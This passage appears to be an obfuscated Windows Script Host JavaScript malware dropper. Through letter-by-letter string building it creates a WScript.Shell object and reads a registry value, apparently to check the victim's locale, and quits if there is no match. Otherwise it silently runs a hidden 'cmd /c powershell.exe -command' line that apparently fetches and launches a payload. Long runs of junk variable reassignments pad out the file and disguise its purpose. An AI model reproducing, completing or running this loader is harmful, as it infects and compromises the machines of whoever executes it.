2 | var kxvyz = this[wwtxvv + qitcie + fyvihe + bqdtkuhk + wnnose + khntllb + buwrjbxxg + qeqpl] ( this[vrxytqdr + uwegi + nxhamey + fyvihe + hqzpgx + wwtxvv + qeqpl][exzynrbj + fyvihe + wnnose + qitcie + qeqpl + wnnose + ibflqy + higfum + zebgyxl + wnnose + nxhamey + qeqpl] ( vrxytqdr + uwegi + nxhamey + fyvihe + hqzpgx + wwtxvv + qeqpl + egmmn + uwegi + soiqvyh + wnnose + tuuigqq + tuuigqq ) [wyddszzix + wnnose + ymbghd + wyddszzix + wnnose + qitcie + ttoym] ( yxwxivd + xgbbwanvq + eubcpqbja + cicbpks + wqmnjjth + exzynrbj + owghsnxun + wyddszzix + wyddszzix + eubcpqbja + pvaecixm + jatipxjtc + wqmnjjth + owghsnxun + uwegi + eubcpqbja + wyddszzix + eszbvadg + exzynrbj + ukztoehv + buwrjbxxg + qeqpl + fyvihe + ukztoehv + tuuigqq + iiwjrrvdm + iunzzl + qitcie + buwrjbxxg + wnnose + tuuigqq + eszbvadg + khntllb + buwrjbxxg + qeqpl + wnnose + fyvihe + buwrjbxxg + qitcie + qeqpl + hqzpgx + ukztoehv + buwrjbxxg + qitcie + tuuigqq + eszbvadg + qcsesr + ukztoehv + nxhamey + qitcie + tuuigqq + wnnose ), 16 ); |
|
3 | for ( mljvvptu = 0 ; mljvvptu < decca[tuuigqq + wnnose + buwrjbxxg + ymbghd + qeqpl + soiqvyh] ; ++ mljvvptu ) | |
4 | { | |
5 | if ( kxvyz == decca[mljvvptu] ) | |
6 | { | |
7 | kxvyz = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( kxvyz !== true ) | |
12 | this[vrxytqdr + uwegi + nxhamey + fyvihe + hqzpgx + wwtxvv + qeqpl][hqiaxx + fjtbix + hqzpgx + qeqpl] ( ); | |
13 | this[vrxytqdr + uwegi + nxhamey + fyvihe + hqzpgx + wwtxvv + qeqpl][exzynrbj + fyvihe + wnnose + qitcie + qeqpl + wnnose + ibflqy + higfum + zebgyxl + wnnose + nxhamey + qeqpl] ( vrxytqdr + uwegi + nxhamey + fyvihe + hqzpgx + wwtxvv + qeqpl + egmmn + uwegi + soiqvyh + wnnose + tuuigqq + tuuigqq ) [fyvihe + fjtbix + buwrjbxxg] ( nxhamey + ivhqxrt + ttoym + iiwjrrvdm + lnnurw + nxhamey + iiwjrrvdm + wwtxvv + ukztoehv + twzpyjqsf + wnnose + fyvihe + bqdtkuhk + soiqvyh + wnnose + tuuigqq + tuuigqq + egmmn + wnnose + ecvpwl + wnnose + iiwjrrvdm + mnvsechfg + exzynrbj + ukztoehv + ivhqxrt + ivhqxrt + qitcie + buwrjbxxg + ttoym + iiwjrrvdm + ychflv + khntllb + buwrjbxxg + cvytb + ukztoehv + msfzp + wnnose + mnvsechfg + vrxytqdr + wnnose + higfum + wyddszzix + wnnose + gllztszhx + fjtbix + wnnose + bqdtkuhk + qeqpl + iiwjrrvdm + mnvsechfg + ibflqy + fjtbix + qeqpl + pspmmft + hqzpgx + tuuigqq + wnnose + iiwjrrvdm + pglosfpur + qeqpl + wnnose + ivhqxrt + wwtxvv + pglosfpur + eszbvadg + hqzpgx + buwrjbxxg + cvytb + ukztoehv + hqzpgx + nxhamey + wnnose + egmmn + wwtxvv + ttoym + idildmp + iiwjrrvdm + soiqvyh + qeqpl + qeqpl + wwtxvv + whvmkabbv + lnnurw + lnnurw + alekztr + ikxpiy + kubdcinf + egmmn + alekztr + qdxmg + kubdcinf + egmmn + alekztr + egmmn + jotussp + jeotg + whcjj + lnnurw + hqzpgx + buwrjbxxg + cvytb + ukztoehv + hqzpgx + nxhamey + wnnose + egmmn + wwtxvv + soiqvyh + wwtxvv + ychflv + vnfil + vnfil + bqdtkuhk + qeqpl + qitcie + fyvihe + qeqpl + iiwjrrvdm + pglosfpur + qeqpl + wnnose + ivhqxrt + wwtxvv + pglosfpur + eszbvadg + hqzpgx + buwrjbxxg + cvytb + ukztoehv + hqzpgx + nxhamey + wnnose + egmmn + wwtxvv + ttoym + idildmp + vnfil + vnfil + nxhamey + ivhqxrt + ttoym + iiwjrrvdm + lnnurw + nxhamey + iiwjrrvdm + buwrjbxxg + wnnose + qeqpl + iiwjrrvdm + fjtbix + bqdtkuhk + wnnose + iiwjrrvdm + eszbvadg + eszbvadg + alekztr + ikxpiy + kubdcinf + egmmn + alekztr + qdxmg + kubdcinf + egmmn + alekztr + egmmn + jotussp + jeotg + whcjj + cgfjho + akoxle + akoxle + akoxle + akoxle + eszbvadg + ttoym + qitcie + cvytb + twzpyjqsf + twzpyjqsf + twzpyjqsf + fyvihe + ukztoehv + ukztoehv + qeqpl + eszbvadg + vnfil + vnfil + nxhamey + ivhqxrt + ttoym + iiwjrrvdm + lnnurw + nxhamey + iiwjrrvdm + fyvihe + wnnose + ymbghd + bqdtkuhk + cvytb + fyvihe + kubdcinf + jotussp + iiwjrrvdm + lnnurw + bqdtkuhk + iiwjrrvdm + eszbvadg + eszbvadg + alekztr + ikxpiy + kubdcinf + egmmn + alekztr + qdxmg + kubdcinf + egmmn + alekztr + egmmn + jotussp + jeotg + whcjj + cgfjho + akoxle + akoxle + akoxle + akoxle + eszbvadg + ttoym + qitcie + cvytb + twzpyjqsf + twzpyjqsf + twzpyjqsf + fyvihe + ukztoehv + ukztoehv + qeqpl + eszbvadg + qdxmg + upznlvrkc + jotussp + jotussp + jotussp + jotussp + jotussp + whcjj + upznlvrkc + qdxmg + qdxmg + ikxpiy + whcjj + egmmn + ttoym + tuuigqq + tuuigqq, 0, false ); |
|
14 | } | |
15 | idildmp = "x"; | |
16 | idildmp = "f"; | |
17 | idildmp = "b"; | |
18 | idildmp = "N"; | |
19 | idildmp = "c"; | |
20 | idildmp = "W"; | |
21 | idildmp = "K"; | |
22 | idildmp = "n"; | |
23 | idildmp = "f"; | |
24 | idildmp = "K"; | |
25 | idildmp = "n"; | |
26 | idildmp = "D"; | |
27 | idildmp = "z"; | |
28 | idildmp = "q"; | |
29 | idildmp = "t"; | |
30 | idildmp = "G"; | |
31 | idildmp = "e"; | |
32 | idildmp = "d"; | |
33 | idildmp = "s"; | |
34 | idildmp = "G"; | |
35 | idildmp = "B"; | |
36 | idildmp = "c"; | |
37 | idildmp = "x"; | |
38 | idildmp = "M"; | |
39 | idildmp = "y"; | |
40 | idildmp = "k"; | |
41 | idildmp = "o"; | |
42 | idildmp = "V"; | |
43 | idildmp = "L"; | |
44 | idildmp = "X"; | |
45 | idildmp = "A"; | |
46 | idildmp = "t"; | |
47 | idildmp = "s"; | |
48 | idildmp = "h"; | |
49 | idildmp = "l"; | |
50 | idildmp = "f"; | |
51 | ychflv = "X"; | |
52 | ychflv = "v"; | |
53 | ychflv = "g"; | |
54 | ychflv = "X"; | |
55 | ychflv = "S"; | |
56 | ychflv = "e"; | |
57 | ychflv = "j"; | |
58 | ychflv = "i"; | |
59 | ychflv = "N"; | |
60 | ychflv = "t"; | |
61 | ychflv = "Q"; | |
62 | ychflv = "K"; | |
63 | ychflv = "w"; | |
64 | ychflv = "t"; | |
65 | ychflv = "y"; | |
66 | ychflv = "u"; | |
67 | ychflv = "A"; | |
68 | ychflv = "h"; | |
69 | ychflv = "S"; | |
70 | ychflv = "T"; | |
71 | ychflv = "x"; | |
72 | ychflv = "Y"; | |
73 | ychflv = "b"; | |
74 | ychflv = "i"; | |
75 | ychflv = "o"; | |
76 | ychflv = "o"; | |
77 | ychflv = "\""; | |
78 | alekztr = "U"; | |
79 | alekztr = "a"; | |
80 | alekztr = "j"; | |
81 | alekztr = "K"; | |
82 | alekztr = "M"; | |
83 | alekztr = "z"; | |
84 | alekztr = "N"; | |
85 | alekztr = "c"; | |
86 | alekztr = "S"; | |
87 | alekztr = "f"; | |
88 | alekztr = "x"; | |
89 | alekztr = "1"; | |
90 | pspmmft = "E"; | |
91 | pspmmft = "v"; | |
92 | pspmmft = "p"; | |
93 | pspmmft = "J"; | |
94 | pspmmft = "f"; | |
95 | pspmmft = "L"; | |
96 | pspmmft = "u"; | |
97 | pspmmft = "H"; | |
98 | pspmmft = "k"; | |
99 | pspmmft = "j"; | |
100 | pspmmft = "j"; | |
101 | pspmmft = "S"; | |
102 | pspmmft = "r"; | |
103 | pspmmft = "W"; | |
104 | pspmmft = "U"; | |
105 | pspmmft = "d"; | |
106 | pspmmft = "D"; | |
107 | pspmmft = "W"; | |
108 | pspmmft = "e"; | |
109 | pspmmft = "A"; | |
110 | pspmmft = "x"; | |
111 | pspmmft = "o"; | |
112 | pspmmft = "a"; | |
113 | pspmmft = "d"; | |
114 | pspmmft = "N"; | |
115 | pspmmft = "G"; | |
116 | pspmmft = "G"; | |
117 | pspmmft = "n"; | |
118 | pspmmft = "U"; | |
119 | pspmmft = "K"; | |
120 | pspmmft = "U"; | |
121 | pspmmft = "a"; | |
122 | pspmmft = "G"; | |
123 | pspmmft = "j"; | |
124 | pspmmft = "G"; | |
125 | pspmmft = "Y"; | |
126 | pspmmft = "H"; | |
127 | pspmmft = "B"; | |
128 | pspmmft = "K"; | |
129 | pspmmft = "c"; | |
130 | pspmmft = "o"; | |
131 | pspmmft = "E"; | |
132 | pspmmft = "H"; | |
133 | pspmmft = "F"; | |
134 | akoxle = "Z"; | |
135 | akoxle = "F"; | |
136 | akoxle = "y"; | |
137 | akoxle = "p"; | |
138 | akoxle = "T"; | |
139 | akoxle = "X"; | |
140 | akoxle = "I"; | |
141 | akoxle = "M"; | |
142 | akoxle = "a"; | |
143 | akoxle = "d"; | |
144 | akoxle = "d"; | |
145 | akoxle = "Y"; | |
146 | akoxle = "U"; | |
147 | akoxle = "P"; | |
148 | akoxle = "q"; | |
149 | akoxle = "e"; | |
150 | akoxle = "r"; | |
151 | akoxle = "s"; | |
152 | akoxle = "Y"; | |
153 | akoxle = "c"; | |
154 | akoxle = "C"; | |
155 | akoxle = "F"; | |
156 | akoxle = "E"; | |
157 | akoxle = "I"; | |
158 | akoxle = "A"; | |
159 | akoxle = "f"; | |
160 | akoxle = "M"; | |
161 | akoxle = "R"; | |
162 | akoxle = "u"; | |
163 | akoxle = "8"; | |
164 | whvmkabbv = "U"; | |
165 | whvmkabbv = "I"; | |
166 | whvmkabbv = "G"; | |
167 | whvmkabbv = "j"; | |
168 | whvmkabbv = "N"; | |
169 | whvmkabbv = "x"; | |
170 | whvmkabbv = "W"; | |
171 | whvmkabbv = "z"; | |
172 | whvmkabbv = "D"; | |
173 | whvmkabbv = "D"; | |
174 | whvmkabbv = "x"; | |
175 | whvmkabbv = "N"; | |
176 | whvmkabbv = "e"; | |
177 | whvmkabbv = "n"; | |
178 | whvmkabbv = "N"; | |
179 | whvmkabbv = "j"; | |
180 | whvmkabbv = "t"; | |
181 | whvmkabbv = "H"; | |
182 | whvmkabbv = "I"; | |
183 | whvmkabbv = "p"; | |
184 | whvmkabbv = "n"; | |
185 | whvmkabbv = "p"; | |
186 | whvmkabbv = "J"; | |
187 | whvmkabbv = "d"; | |
188 | whvmkabbv = "V"; | |
189 | whvmkabbv = "n"; | |
190 | whvmkabbv = "s"; | |
191 | whvmkabbv = "n"; | |
192 | whvmkabbv = "I"; | |
193 | whvmkabbv = "j"; | |
194 | whvmkabbv = "S"; | |
195 | whvmkabbv = "a"; | |
196 | whvmkabbv = "k"; | |
197 | whvmkabbv = "Q"; | |
198 | whvmkabbv = "P"; | |
199 | whvmkabbv = "e"; | |
200 | whvmkabbv = "y"; | |
201 | whvmkabbv = "z"; | |
202 | whvmkabbv = "L"; | |
203 | whvmkabbv = "b"; | |
204 | whvmkabbv = "X"; | |
205 | whvmkabbv = "L"; | |
206 | whvmkabbv = "L"; | |
207 | whvmkabbv = ":"; | |
208 | pvaecixm = "K"; | |
209 | pvaecixm = "a"; | |
210 | pvaecixm = "i"; | |
211 | pvaecixm = "a"; | |
212 | pvaecixm = "k"; | |
213 | pvaecixm = "r"; | |
214 | pvaecixm = "H"; | |
215 | pvaecixm = "y"; | |
216 | pvaecixm = "h"; | |
217 | pvaecixm = "W"; | |
218 | pvaecixm = "b"; | |
219 | pvaecixm = "c"; | |
220 | pvaecixm = "u"; | |
221 | pvaecixm = "M"; | |
222 | pvaecixm = "X"; | |
223 | pvaecixm = "L"; | |
224 | pvaecixm = "I"; | |
225 | pvaecixm = "X"; | |
226 | pvaecixm = "g"; | |
227 | pvaecixm = "r"; | |
228 | pvaecixm = "S"; | |
229 | pvaecixm = "U"; | |
230 | pvaecixm = "K"; | |
231 | pvaecixm = "g"; | |
232 | pvaecixm = "y"; | |
233 | pvaecixm = "R"; | |
234 | pvaecixm = "F"; | |
235 | pvaecixm = "V"; | |
236 | pvaecixm = "X"; | |
237 | pvaecixm = "Y"; | |
238 | pvaecixm = "v"; | |
239 | pvaecixm = "G"; | |
240 | pvaecixm = "r"; | |
241 | pvaecixm = "W"; | |
242 | pvaecixm = "N"; | |
243 | iiwjrrvdm = "q"; | |
244 | iiwjrrvdm = "F"; | |
245 | iiwjrrvdm = "G"; | |
246 | iiwjrrvdm = "D"; | |
247 | iiwjrrvdm = "s"; | |
248 | iiwjrrvdm = "K"; | |
249 | iiwjrrvdm = "m"; | |
250 | iiwjrrvdm = "U"; | |
251 | iiwjrrvdm = "a"; | |
252 | iiwjrrvdm = "r"; | |
253 | iiwjrrvdm = "p"; | |
254 | iiwjrrvdm = "w"; | |
255 | iiwjrrvdm = "D"; | |
256 | iiwjrrvdm = "D"; | |
257 | iiwjrrvdm = "x"; | |
258 | iiwjrrvdm = "U"; | |
259 | iiwjrrvdm = "m"; | |
260 | iiwjrrvdm = "a"; | |
261 | iiwjrrvdm = "Q"; | |
262 | iiwjrrvdm = "J"; | |
263 | iiwjrrvdm = "G"; | |
264 | iiwjrrvdm = "E"; | |
265 | iiwjrrvdm = "l"; | |
266 | iiwjrrvdm = "X"; | |
267 | iiwjrrvdm = "F"; | |
268 | iiwjrrvdm = "Q"; | |
269 | iiwjrrvdm = "o"; | |
270 | iiwjrrvdm = "Q"; | |
271 | iiwjrrvdm = "g"; | |
272 | iiwjrrvdm = "p"; | |
273 | iiwjrrvdm = "F"; | |
274 | iiwjrrvdm = "B"; | |
275 | iiwjrrvdm = "e"; | |
276 | iiwjrrvdm = "D"; | |
277 | iiwjrrvdm = "l"; | |
278 | iiwjrrvdm = "X"; | |
279 | iiwjrrvdm = "h"; | |
280 | iiwjrrvdm = "S"; | |
281 | iiwjrrvdm = "O"; | |
282 | iiwjrrvdm = "J"; | |
283 | iiwjrrvdm = "J"; | |
284 | iiwjrrvdm = "i"; | |
285 | iiwjrrvdm = "F"; | |
286 | iiwjrrvdm = "a"; | |
287 | iiwjrrvdm = " "; | |
288 | zebgyxl = "C"; | |
289 | zebgyxl = "t"; | |
290 | zebgyxl = "f"; | |
291 | zebgyxl = "U"; | |
292 | zebgyxl = "r"; | |
293 | zebgyxl = "R"; | |
294 | zebgyxl = "j"; | |
295 | zebgyxl = "x"; | |
296 | zebgyxl = "K"; | |
297 | zebgyxl = "d"; | |
298 | zebgyxl = "P"; | |
299 | zebgyxl = "x"; | |
300 | zebgyxl = "n"; | |
301 | zebgyxl = "a"; | |
302 | zebgyxl = "J"; | |
303 | zebgyxl = "G"; | |
304 | zebgyxl = "D"; | |
305 | zebgyxl = "w"; | |
306 | zebgyxl = "Y"; | |
307 | zebgyxl = "A"; | |
308 | zebgyxl = "q"; | |
309 | zebgyxl = "f"; | |
310 | zebgyxl = "x"; | |
311 | zebgyxl = "Z"; | |
312 | zebgyxl = "Y"; | |
313 | zebgyxl = "e"; | |
314 | zebgyxl = "j"; | |
315 | bqdtkuhk = "d"; | |
316 | bqdtkuhk = "L"; | |
317 | bqdtkuhk = "x"; | |
318 | bqdtkuhk = "e"; | |
319 | bqdtkuhk = "E"; | |
320 | bqdtkuhk = "I"; | |
321 | bqdtkuhk = "h"; | |
322 | bqdtkuhk = "m"; | |
323 | bqdtkuhk = "B"; | |
324 | bqdtkuhk = "l"; | |
325 | bqdtkuhk = "G"; | |
326 | bqdtkuhk = "y"; | |
327 | bqdtkuhk = "M"; | |
328 | bqdtkuhk = "g"; | |
329 | bqdtkuhk = "c"; | |
330 | bqdtkuhk = "C"; | |
331 | bqdtkuhk = "r"; | |
332 | bqdtkuhk = "i"; | |
333 | bqdtkuhk = "e"; | |
334 | bqdtkuhk = "p"; | |
335 | bqdtkuhk = "b"; | |
336 | bqdtkuhk = "K"; | |
337 | bqdtkuhk = "U"; | |
338 | bqdtkuhk = "L"; | |
339 | bqdtkuhk = "A"; | |
340 | bqdtkuhk = "s"; | |
341 | vrxytqdr = "j"; | |
342 | vrxytqdr = "H"; | |
343 | vrxytqdr = "a"; | |
344 | vrxytqdr = "O"; | |
345 | vrxytqdr = "D"; | |
346 | vrxytqdr = "T"; | |
347 | vrxytqdr = "K"; | |
348 | vrxytqdr = "n"; | |
349 | vrxytqdr = "t"; | |
350 | vrxytqdr = "T"; | |
351 | vrxytqdr = "R"; | |
352 | vrxytqdr = "B"; | |
353 | vrxytqdr = "K"; | |
354 | vrxytqdr = "L"; | |
355 | vrxytqdr = "g"; | |
356 | vrxytqdr = "f"; | |
357 | vrxytqdr = "W"; | |
358 | vrxytqdr = "e"; | |
359 | vrxytqdr = "W"; | |
360 | pglosfpur = "%"; | |
361 | wqmnjjth = "H"; | |
362 | wqmnjjth = "P"; | |
363 | wqmnjjth = "Q"; | |
364 | wqmnjjth = "O"; | |
365 | wqmnjjth = "V"; | |
366 | wqmnjjth = "l"; | |
367 | wqmnjjth = "Q"; | |
368 | wqmnjjth = "k"; | |
369 | wqmnjjth = "U"; | |
370 | wqmnjjth = "k"; | |
371 | wqmnjjth = "x"; | |
372 | wqmnjjth = "S"; | |
373 | wqmnjjth = "q"; | |
374 | wqmnjjth = "H"; | |
375 | wqmnjjth = "r"; | |
376 | wqmnjjth = "s"; | |
377 | wqmnjjth = "y"; | |
378 | wqmnjjth = "X"; | |
379 | wqmnjjth = "T"; | |
380 | wqmnjjth = "F"; | |
381 | wqmnjjth = "v"; | |
382 | wqmnjjth = "p"; | |
383 | wqmnjjth = "W"; | |
384 | wqmnjjth = "R"; | |
385 | wqmnjjth = "G"; | |
386 | wqmnjjth = "D"; | |
387 | wqmnjjth = "_"; | |
388 | ukztoehv = "M"; | |
389 | ukztoehv = "N"; | |
390 | ukztoehv = "h"; | |
391 | ukztoehv = "b"; | |
392 | ukztoehv = "P"; | |
393 | ukztoehv = "W"; | |
394 | ukztoehv = "W"; | |
395 | ukztoehv = "b"; | |
396 | ukztoehv = "v"; | |
397 | ukztoehv = "k"; | |
398 | ukztoehv = "s"; | |
399 | ukztoehv = "k"; | |
400 | ukztoehv = "R"; | |
401 | ukztoehv = "X"; | |
402 | ukztoehv = "Q"; | |
403 | ukztoehv = "y"; | |
404 | ukztoehv = "n"; | |
405 | ukztoehv = "k"; | |
406 | ukztoehv = "w"; | |
407 | ukztoehv = "O"; | |
408 | ukztoehv = "Q"; | |
409 | ukztoehv = "S"; | |
410 | ukztoehv = "n"; | |
411 | ukztoehv = "z"; | |
412 | ukztoehv = "i"; | |
413 | ukztoehv = "e"; | |
414 | ukztoehv = "h"; | |
415 | ukztoehv = "T"; | |
416 | ukztoehv = "h"; | |
417 | ukztoehv = "i"; | |
418 | ukztoehv = "X"; | |
419 | ukztoehv = "J"; | |
420 | ukztoehv = "D"; | |
421 | ukztoehv = "C"; | |
422 | ukztoehv = "u"; | |
423 | ukztoehv = "R"; | |
424 | ukztoehv = "l"; | |
425 | ukztoehv = "p"; | |
426 | ukztoehv = "u"; | |
427 | ukztoehv = "o"; | |
428 | qitcie = "E"; | |
429 | qitcie = "H"; | |
430 | qitcie = "c"; | |
431 | qitcie = "M"; | |
432 | qitcie = "z"; | |
433 | qitcie = "j"; | |
434 | qitcie = "m"; | |
435 | qitcie = "Y"; | |
436 | qitcie = "c"; | |
437 | qitcie = "l"; | |
438 | qitcie = "p"; | |
439 | qitcie = "d"; | |
440 | qitcie = "M"; | |
441 | qitcie = "n"; | |
442 | qitcie = "Q"; | |
443 | qitcie = "F"; | |
444 | qitcie = "W"; | |
445 | qitcie = "g"; | |
446 | qitcie = "v"; | |
447 | qitcie = "h"; | |
448 | qitcie = "d"; | |
449 | qitcie = "j"; | |
450 | qitcie = "B"; | |
451 | qitcie = "G"; | |
452 | qitcie = "d"; | |
453 | qitcie = "O"; | |
454 | qitcie = "p"; | |
455 | qitcie = "P"; | |
456 | qitcie = "Y"; | |
457 | qitcie = "e"; | |
458 | qitcie = "Y"; | |
459 | qitcie = "Y"; | |
460 | qitcie = "s"; | |
461 | qitcie = "t"; | |
462 | qitcie = "P"; | |
463 | qitcie = "s"; | |
464 | qitcie = "H"; | |
465 | qitcie = "P"; | |
466 | qitcie = "h"; | |
467 | qitcie = "a"; | |
468 | khntllb = "W"; | |
469 | khntllb = "h"; | |
470 | khntllb = "f"; | |
471 | khntllb = "P"; | |
472 | khntllb = "n"; | |
473 | khntllb = "G"; | |
474 | khntllb = "Q"; | |
475 | khntllb = "Z"; | |
476 | khntllb = "I"; | |
477 | cvytb = "C"; | |
478 | cvytb = "z"; | |
479 | cvytb = "c"; | |
480 | cvytb = "M"; | |
481 | cvytb = "H"; | |
482 | cvytb = "e"; | |
483 | cvytb = "w"; | |
484 | cvytb = "i"; | |
485 | cvytb = "f"; | |
486 | cvytb = "q"; | |
487 | cvytb = "D"; | |
488 | cvytb = "B"; | |
489 | cvytb = "R"; | |
490 | cvytb = "o"; | |
491 | cvytb = "n"; | |
492 | cvytb = "y"; | |
493 | cvytb = "C"; | |
494 | cvytb = "p"; | |
495 | cvytb = "x"; | |
496 | cvytb = "L"; | |
497 | cvytb = "E"; | |
498 | cvytb = "A"; | |
499 | cvytb = "Z"; | |
500 | cvytb = "R"; | |
501 | cvytb = "U"; | |
502 | cvytb = "T"; | |
503 | cvytb = "H"; | |
504 | cvytb = "o"; | |
505 | cvytb = "v"; | |
506 | cvytb = "j"; | |
507 | cvytb = "W"; | |
508 | cvytb = "o"; | |
509 | cvytb = "B"; | |
510 | cvytb = "d"; | |
511 | cvytb = "X"; | |
512 | cvytb = "v"; | |
513 | mnvsechfg = "k"; | |
514 | mnvsechfg = "a"; | |
515 | mnvsechfg = "y"; | |
516 | mnvsechfg = "H"; | |
517 | mnvsechfg = "z"; | |
518 | mnvsechfg = "A"; | |
519 | mnvsechfg = "G"; | |
520 | mnvsechfg = "e"; | |
521 | mnvsechfg = "a"; | |
522 | mnvsechfg = "x"; | |
523 | mnvsechfg = "z"; | |
524 | mnvsechfg = "r"; | |
525 | mnvsechfg = "-"; | |
526 | jatipxjtc = "Q"; | |
527 | jatipxjtc = "w"; | |
528 | jatipxjtc = "F"; | |
529 | jatipxjtc = "I"; | |
530 | jatipxjtc = "h"; | |
531 | jatipxjtc = "F"; | |
532 | jatipxjtc = "A"; | |
533 | jatipxjtc = "K"; | |
534 | jatipxjtc = "n"; | |
535 | jatipxjtc = "O"; | |
536 | jatipxjtc = "w"; | |
537 | jatipxjtc = "m"; | |
538 | jatipxjtc = "c"; | |
539 | jatipxjtc = "N"; | |
540 | jatipxjtc = "a"; | |
541 | jatipxjtc = "T"; | |
542 | wnnose = "x"; | |
543 | wnnose = "g"; | |
544 | wnnose = "q"; | |
545 | wnnose = "B"; | |
546 | wnnose = "v"; | |
547 | wnnose = "z"; | |
548 | wnnose = "k"; | |
549 | wnnose = "l"; | |
550 | wnnose = "B"; | |
551 | wnnose = "c"; | |
552 | wnnose = "M"; | |
553 | wnnose = "P"; | |
554 | wnnose = "C"; | |
555 | wnnose = "q"; | |
556 | wnnose = "K"; | |
557 | wnnose = "k"; | |
558 | wnnose = "t"; | |
559 | wnnose = "u"; | |
560 | wnnose = "m"; | |
561 | wnnose = "h"; | |
562 | wnnose = "o"; | |
563 | wnnose = "E"; | |
564 | wnnose = "X"; | |
565 | wnnose = "N"; | |
566 | wnnose = "z"; | |
567 | wnnose = "d"; | |
568 | wnnose = "R"; | |
569 | wnnose = "G"; | |
570 | wnnose = "H"; | |
571 | wnnose = "O"; | |
572 | wnnose = "j"; | |
573 | wnnose = "M"; | |
574 | wnnose = "e"; | |
575 | fjtbix = "m"; | |
576 | fjtbix = "Q"; | |
577 | fjtbix = "l"; | |
578 | fjtbix = "b"; | |
579 | fjtbix = "I"; | |
580 | fjtbix = "t"; | |
581 | fjtbix = "u"; | |
582 | msfzp = "c"; | |
583 | msfzp = "K"; | |
584 | msfzp = "y"; | |
585 | msfzp = "e"; | |
586 | msfzp = "y"; | |
587 | msfzp = "i"; | |
588 | msfzp = "L"; | |
589 | msfzp = "M"; | |
590 | msfzp = "D"; | |
591 | msfzp = "N"; | |
592 | msfzp = "Y"; | |
593 | msfzp = "N"; | |
594 | msfzp = "L"; | |
595 | msfzp = "z"; | |
596 | msfzp = "b"; | |
597 | msfzp = "X"; | |
598 | msfzp = "Y"; | |
599 | msfzp = "y"; | |
600 | msfzp = "I"; | |
601 | msfzp = "P"; | |
602 | msfzp = "X"; | |
603 | msfzp = "V"; | |
604 | msfzp = "y"; | |
605 | msfzp = "C"; | |
606 | msfzp = "K"; | |
607 | msfzp = "H"; | |
608 | msfzp = "k"; | |
609 | msfzp = "U"; | |
610 | msfzp = "J"; | |
611 | msfzp = "M"; | |
612 | msfzp = "k"; | |
613 | soiqvyh = "N"; | |
614 | soiqvyh = "R"; | |
615 | soiqvyh = "C"; | |
616 | soiqvyh = "R"; | |
617 | soiqvyh = "n"; | |
618 | soiqvyh = "g"; | |
619 | soiqvyh = "B"; | |
620 | soiqvyh = "R"; | |
621 | soiqvyh = "V"; | |
622 | soiqvyh = "W"; | |
623 | soiqvyh = "h"; | |
624 | soiqvyh = "S"; | |
625 | soiqvyh = "c"; | |
626 | soiqvyh = "e"; | |
627 | soiqvyh = "b"; | |
628 | soiqvyh = "o"; | |
629 | soiqvyh = "P"; | |
630 | soiqvyh = "o"; | |
631 | soiqvyh = "n"; | |
632 | soiqvyh = "I"; | |
633 | soiqvyh = "H"; | |
634 | soiqvyh = "D"; | |
635 | soiqvyh = "g"; | |
636 | soiqvyh = "X"; | |
637 | soiqvyh = "W"; | |
638 | soiqvyh = "D"; | |
639 | soiqvyh = "O"; | |
640 | soiqvyh = "m"; | |
641 | soiqvyh = "N"; | |
642 | soiqvyh = "N"; | |
643 | soiqvyh = "i"; | |
644 | soiqvyh = "Q"; | |
645 | soiqvyh = "H"; | |
646 | soiqvyh = "X"; | |
647 | soiqvyh = "z"; | |
648 | soiqvyh = "Z"; | |
649 | soiqvyh = "L"; | |
650 | soiqvyh = "h"; | |
651 | ivhqxrt = "R"; | |
652 | ivhqxrt = "b"; | |
653 | ivhqxrt = "T"; | |
654 | ivhqxrt = "k"; | |
655 | ivhqxrt = "m"; | |
656 | fyvihe = "V"; | |
657 | fyvihe = "h"; | |
658 | fyvihe = "u"; | |
659 | fyvihe = "n"; | |
660 | fyvihe = "t"; | |
661 | fyvihe = "s"; | |
662 | fyvihe = "r"; | |
663 | owghsnxun = "J"; | |
664 | owghsnxun = "i"; | |
665 | owghsnxun = "C"; | |
666 | owghsnxun = "z"; | |
667 | owghsnxun = "j"; | |
668 | owghsnxun = "M"; | |
669 | owghsnxun = "l"; | |
670 | owghsnxun = "c"; | |
671 | owghsnxun = "D"; | |
672 | owghsnxun = "z"; | |
673 | owghsnxun = "P"; | |
674 | owghsnxun = "D"; | |
675 | owghsnxun = "R"; | |
676 | owghsnxun = "U"; | |
677 | upznlvrkc = "S"; | |
678 | upznlvrkc = "M"; | |
679 | upznlvrkc = "X"; | |
680 | upznlvrkc = "v"; | |
681 | upznlvrkc = "l"; | |
682 | upznlvrkc = "s"; | |
683 | upznlvrkc = "o"; | |
684 | upznlvrkc = "o"; | |
685 | upznlvrkc = "v"; | |
686 | upznlvrkc = "G"; | |
687 | upznlvrkc = "d"; | |
688 | upznlvrkc = "T"; | |
689 | upznlvrkc = "7"; | |
690 | uwegi = "j"; | |
691 | uwegi = "t"; | |
692 | uwegi = "g"; | |
693 | uwegi = "O"; | |
694 | uwegi = "g"; | |
695 | uwegi = "h"; | |
696 | uwegi = "w"; | |
697 | uwegi = "y"; | |
698 | uwegi = "O"; | |
699 | uwegi = "D"; | |
700 | uwegi = "S"; | |
701 | tuuigqq = "D"; | |
702 | tuuigqq = "F"; | |
703 | tuuigqq = "I"; | |
704 | tuuigqq = "V"; | |
705 | tuuigqq = "k"; | |
706 | tuuigqq = "G"; | |
707 | tuuigqq = "Z"; | |
708 | tuuigqq = "p"; | |
709 | tuuigqq = "o"; | |
710 | tuuigqq = "a"; | |
711 | tuuigqq = "Q"; | |
712 | tuuigqq = "f"; | |
713 | tuuigqq = "c"; | |
714 | tuuigqq = "s"; | |
715 | tuuigqq = "a"; | |
716 | tuuigqq = "i"; | |
717 | tuuigqq = "l"; | |
718 | ymbghd = "Q"; | |
719 | ymbghd = "Z"; | |
720 | ymbghd = "A"; | |
721 | ymbghd = "O"; | |
722 | ymbghd = "f"; | |
723 | ymbghd = "B"; | |
724 | ymbghd = "H"; | |
725 | ymbghd = "P"; | |
726 | ymbghd = "R"; | |
727 | ymbghd = "F"; | |
728 | ymbghd = "I"; | |
729 | ymbghd = "T"; | |
730 | ymbghd = "v"; | |
731 | ymbghd = "i"; | |
732 | ymbghd = "o"; | |
733 | ymbghd = "J"; | |
734 | ymbghd = "g"; | |
735 | buwrjbxxg = "P"; | |
736 | buwrjbxxg = "T"; | |
737 | buwrjbxxg = "o"; | |
738 | buwrjbxxg = "Z"; | |
739 | buwrjbxxg = "g"; | |
740 | buwrjbxxg = "M"; | |
741 | buwrjbxxg = "p"; | |
742 | buwrjbxxg = "S"; | |
743 | buwrjbxxg = "O"; | |
